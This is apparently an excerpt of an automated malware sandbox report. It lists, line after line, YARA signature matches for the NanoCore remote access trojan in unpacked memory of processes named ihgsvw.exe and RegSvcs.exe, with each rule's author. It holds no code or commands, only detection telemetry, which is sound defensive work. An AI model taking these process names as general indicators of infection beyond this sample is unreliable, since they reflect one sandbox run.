      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
